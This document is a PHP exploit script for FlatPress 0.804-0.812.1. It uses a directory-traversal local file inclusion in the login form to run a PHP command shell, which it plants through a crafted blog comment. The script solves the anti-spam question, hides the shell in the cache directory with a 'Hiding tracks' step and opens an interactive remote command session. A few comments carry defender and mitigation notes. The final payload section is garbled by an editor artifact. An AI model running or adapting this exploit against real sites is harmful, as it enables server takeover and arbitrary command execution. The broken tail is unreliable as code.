FlatPress 0.804-0.812.1 Local File Inclusion to Remote Command Execution vulnerability
来源:giuseppe(dot)fuggiano(at)gmail(dot)com 作者:Giuseppe 发布时间:2009-10-09  
<?php
  /* Author: Giuseppe `Zmax` Fuggiano <giuseppe(dot)fuggiano(at)gmail(dot)com>
   *
   * Description: FlatPress 0.804-0.812.1 Local File Inclusion to Remote Command Execution
   *              vulnerability exploit (fp-includes/core/core.users.php).
   *              This code posts a crafted comment with a very simple PHP shell.
   *              It exploits the LFI, hides the shell in the cache directory
   *              and starts a remote command session via POST.
   *
   * Syntax: php fp-lfi2rce.php <host> <path> [action] [lang] [shell]
   *         <host>:   the hostname or IP address of your target;
   *         <path>:   the path where FlatPress was installed;
   *         [action]: the action to take against the host system (test, attack);
   *         [lang]:   the remote language used (en, it);
   *         [shell]:  if already exploited, you could just have the shell name.
   *
   * Dependencies: php5-curl.
   *
   * Examples:
   *   php fp-lfi2rce.php www.example.com /       => will test
   *   php fp-lfi2rce.php www.example.com /blog attack       => will attack
   *   php fp-lfi2rce.php www.example.com /flatpress attack en 12345678.php  => start remote session
   */

  /* GET request: configures the shared curl handle for $url and returns the
   * response body (curl_exec() result, so false on transport failure).
   * The cookie jar/file 'cookie.txt' lives in the current working directory
   * and is shared with post_url_fields() to keep one session across calls. */
  function get_url_contents($crl, $url)
  {
    $options = array(
      CURLOPT_URL            => $url,
      CURLOPT_RETURNTRANSFER => 1,
      CURLOPT_CONNECTTIMEOUT => 10,
      CURLOPT_COOKIEJAR      => 'cookie.txt',
      CURLOPT_COOKIEFILE     => 'cookie.txt',
    );

    foreach ($options as $option => $value)
      curl_setopt($crl, $option, $value);

    return curl_exec($crl);
  }

  /* POST request: sends $fields (string or array, passed straight to
   * CURLOPT_POSTFIELDS) to $url on the shared handle and returns the response
   * body (false on transport failure). Uses the same 'cookie.txt' jar as
   * get_url_contents() so the session persists between requests. */
  function post_url_fields($crl, $url, $fields)
  {
    $options = array(
      CURLOPT_URL            => $url,
      CURLOPT_RETURNTRANSFER => 1,
      CURLOPT_CONNECTTIMEOUT => 10,
      CURLOPT_POST           => 1,
      CURLOPT_POSTFIELDS     => $fields,
      CURLOPT_COOKIEJAR      => 'cookie.txt',
      CURLOPT_COOKIEFILE     => 'cookie.txt',
    );

    foreach ($options as $option => $value)
      curl_setopt($crl, $option, $value);

    return curl_exec($crl);
  }

  /* Execute remote command, returns the output.
   * $crl: shared curl handle; $sh: URL the command is POSTed to; $cmd: sent
   * verbatim as the POST field "c" (no encoding is applied).
   * The reply is expected to wrap the output between the literal markers
   * 'http://www.aaa' and 'aaa.com'; only the text between them is returned.
   * Returns false when the reply body is empty/false. A missing marker is not
   * detected: strpos() returning false makes $pos1 equal to 14, so the slice
   * returned in that case is arbitrary page content rather than an error. */
  function fp_exec($crl, $sh, $cmd)
  {
    $ret = post_url_fields($crl, $sh, "c=$cmd");

    if ($ret) {
      $pos1 = strpos($ret, 'http://www.aaa') + 14;
      $pos2 = strpos($ret, 'aaa.com', $pos1);
      $result = substr($ret, $pos1, $pos2-$pos1);
      return $result;
    } else
      return false;
  }

  /* Starts a remote command session: reads lines from STDIN and forwards each
   * non-empty one to fp_exec() against $sh until 'quit' or 'exit' is typed.
   * Prints the returned text, or "Error." when fp_exec() returns false.
   * Because the result is tested for truthiness, an empty (or "0") output
   * is also reported as "Error.". */
  function fp_shell($crl, $sh)
  {
    echo "\nStarting remote command session, type 'quit' or 'exit' to exit.\n";

    echo "\nremote> ";
    $line = trim(fgets(STDIN));

    while (($line != 'exit') && ($line != 'quit')) {
      if ($line != "") {
        if ($ret = fp_exec($crl, $sh, $line)) {
          echo "\n$ret";
        } else
          echo "\nError.\n";
      }
      echo "\nremote> ";
      $line = trim(fgets(STDIN));
    }
  }

  /* Releases the curl handle and terminates the script, printing $str. */
  function fail($crl, $str)
  {
    curl_close($crl);
    exit($str);
  }

  /* Banner: repeats the header comment on stdout together with the usage text. */
  echo "\n Author: Giuseppe `Zmax` Fuggiano <giuseppe(dot)fuggiano(at)gmail(dot)com>\n";
  echo "\n";
  echo " Description: FlatPress 0.804-0.812.1 Local File Inclusion to Remote Command Execution\n";
  echo "              vulnerability exploit (fp-includes/core/core.users.php).\n";
  echo "              This code posts a crafted comment with a very simple PHP shell.\n";
  echo "              It exploits the LFI, hides the shell in the cache directory\n";
  echo "              and starts a remote command session via POST.\n";
  echo "\n";
  echo " Syntax: $argv[0] <host> <path> [action] [lang] [shell]\n";
  echo "         <host>:   the hostname or IP address of your target;\n";
  echo "         <path>:   the path where FlatPress was installed;\n";
  echo "         [action]: the action to take against the host system (test, attack);\n";
  echo "         [lang]:   the remote language used (en, it);\n";
  echo "         [shell]:  if already exploited, you could just have the shell name.\n";
  echo "\n";
  echo " Examples:\n";
  echo "         php $argv[0] www.example.com /
          => will test\n";
  echo "         php $argv[0] www.example.com /blog attack
          => will attack\n";
  echo "         php $argv[0] www.example.com /flatpress attack en 12345678.php  => start remote session\n\n";

  /* One curl handle is shared by every request below so that the cookie jar
   * ('cookie.txt', see get_url_contents()/post_url_fields()) carries the
   * FlatPress session from one call to the next. */
  $crl = curl_init();

  /* Usage check: fewer than two positional arguments, or a help flag in the
   * <path> slot, ends the run. The handle opened above is not closed here. */
  if ($argc < 3 || $argv[2] == '--help' || $argv[2] == '-h')
    die();

  $HOST = $argv[1];
  $PATH = $argv[2];

  /* Optional arguments with their defaults: action 'test', language 'en'. */
  if (isset($argv[3]))
    $ACTION = $argv[3];
  else
    $ACTION = 'test';

  if (isset($argv[4]))
    $LANG = $argv[4];
  else
    $LANG = 'en';

  /* Localised fragments of the FlatPress anti-spam comment form. They are
   * only used further down to locate and parse the arithmetic question;
   * any language other than 'it' falls back to the English strings. */
  switch ($LANG) {
    case 'it':
      $LANGARRAY = array('aaspam'   => 'Per prevenire abusi del sistema di commenti, ' .
                                       'ti chiediamo di scrivere il risultato di ' .
                                       'questa semplice operazione matematica',
                         'sum'      => 'sommare',
                         'subtract' => 'togli');
      break;
    default: /* en */
      $LANGARRAY = array('aaspam'   => 'As a way to prevent abuses of this commenting system, ' .
                                       'we must ask you to give the result of this simple ' .
                                       'mathematical operation',
                         'sum'      => 'sum',
                         'subtract' => 'subtract');
      break;
  }

  /* A fifth argument skips every step below and goes straight to the
   * interactive loop against the named file under fp-content/cache/. */
  if (isset($argv[5])) {
    $SHELL = $argv[5];
    fp_shell($crl, "fp-content/cache/$SHELL");
    curl_close($crl);
    exit();
  } else
    $SHELL = 'unknown';

  echo " Host: $HOST\n";
  echo " Path: $PATH\n";
  echo " Lang: $LANG\n";
  echo " Shell: $SHELL\n\n";

  /* Vulnerability test: a login POST whose 'user' field carries a directory
   * traversal sequence; the target is reported vulnerable when the FlatPress
   * generator meta tag is absent from the reply. Defender note: a login.php
   * POST with '../' in the user parameter is the indicator to log and alert on.
   * The comparison below uses '== false', which also matches a strpos() result
   * of 0 (tag found at offset 0). */
  echo " [+] Vulnerability test: ";

  $form = "user=../../admin&pass=".rand()."&submit=Login";
  $loginpage = post_url_fields($crl, "$HOST/$PATH/login.php", $form);

  if (strpos($loginpage, '<meta name="generator" content="FlatPress') == false)
    echo "vulnerable!\n\n";
  else
    fail($crl, "NOT vulnerable!\n\n");

  /* The default action stops after the test. */
  if ($ACTION == "test") {
    curl_close($crl);
    exit();
  }

  /* Step 1: fetch the home page and confirm the generator tag. */
  echo " [+] Creating the shell\n";
  echo "     * Getting the home page: ";

  $home = get_url_contents($crl, "$HOST/$PATH/");

  if (strpos($home, '<meta name="generator" content="FlatPress'))
    echo "ok\n";
  else
    fail($crl, "FAIL!\n\n");

  /* Step 2: pick an entry id (18 characters after the 'x=entry:' marker).
   * strpos() + 8 evaluates to 8 when the marker is missing, so the
   * `if ($entrypos)` guard does not take its failure branch in that case. */
  echo "     * Detecting an article: ";

  $entrypos = strpos($home, "x=entry:entry") + 8;

  if ($entrypos) {
    $entry = substr($home, $entrypos, 18);
    echo "$entry\n";
  } else
    fail($crl, "FAIL!\n\n");

  /* Step 3: load that entry's comment page and check the comment form exists. */
  echo "     * Getting the comment page: ";

  $commentpage = get_url_contents($crl, "$HOST/$PATH/?x=entry:$entry;comments:1");

  if (strpos($commentpage, 'id="comment-userdata"'))
    echo "ok\n";
  else
    fail($crl, "FAIL!\n\n");

  /* Step 4: parse the anti-spam arithmetic question. The text following the
   * localised prompt and the next '<strong>' is tokenised on spaces; the
   * first token is either the verb from $LANGARRAY ('sum' / 'subtract') or a
   * number, in which case the question is read as a multiplication.
   * Anything else aborts via fail(). */
  echo "     * Solving the math operation: ";

  $mathpos = strpos($commentpage, $LANGARRAY['aaspam']) + strlen($LANGARRAY['aaspam']);
  $mathpos = strpos($commentpage, "strong", $mathpos) + strlen("strong>");
  $mathstr = substr($commentpage, $mathpos, strlen($commentpage)-$mathpos);
  $operation = strtok($mathstr, " ");

  switch ($operation) {
    case $LANGARRAY['sum']:
      $first = strtok(' ');
      $to = strtok(' ');
      $second = strtok(' ');
      $result = $first + $second;
      break;
    case $LANGARRAY['subtract']:
      $first = strtok(' ');
      $from = strtok(' ');
      $second = strtok(' ');
      $result = $second - $first;
      break;
    case (is_numeric($operation) ? $operation : ""):
      $first = $operation;
      $times = strtok(' ');
      $second = strtok(' ');
      $result = $first * $second;
      break;
    default:
      fail($crl, "FAIL!\n\n");
  }

  echo "$result\n";

  /* Step 5: the comment posted next carries the payload. The remaining lines
   * of this listing are garbled by the site's editor and are left as found.
   * Mitigation note: as the header describes, the chain depends on the login
   * user name reaching a file include unfiltered and on fp-content/ being
   * web-served with PHP execution allowed; rejecting path separators and NUL
   * bytes in that field before the include, and denying script execution
   * under fp-content/, each break it. */
  echo "     * Posting crafted comment...\n";

  $random = rand();
  $form = 'name='.$random.'&email=fake@fake.com&url=http://www.aaa\<?system(
___FCKpd___0
POST[\'c\']);?\>aaa.com' . '&aaspam='.$result.'&content=foo&submit=Add'; post_url_fields($crl, "$HOST/$PATH/?x=entry:$entry;comments:1", $form); $commentpage = get_url_contents($crl, "$HOST/$PATH/?x=entry:$entry;comments:1"); echo " * Searching comment name: "; if (preg_match_all("/comment[0-9][0-9][0-9][0-9][0-9][0-9]-[0-9][0-9][0-9][0-9][0-9][0-9]/", $commentpage, $comments, PREG_PATTERN_ORDER)) { $commententry = end($comments[0]); echo "$commententry\n"; } else fail($crl, "FAIL!\n\n"); $year = substr($entry, 5, 2); $month = substr($entry, 7, 2); $commentpath = "content/$year/$month/$entry/comments/$commententry.txt"; echo " * Hiding tracks: "; $SHELL = rand().'.php'; $form = "user=../$commentpath%00a&pass=".rand()."&submit=Login" . "&c=mv -f fp-content/$commentpath fp-content/cache/$SHELL"; $loginpage = post_url_fields($crl, "$HOST/$PATH/login.php", $form); if (strpos($loginpage, 'http://www.aaa') && strpos($loginpage, 'aaa.com')) { echo "ok\n\n"; echo " [+] Your shell: fp-content/cache/$SHELL\n"; } else fail($crl, "FAIL!\n\n"); fp_shell($crl, "$HOST/$PATH/fp-content/cache/$SHELL"); curl_close($crl); exit(); ?>

 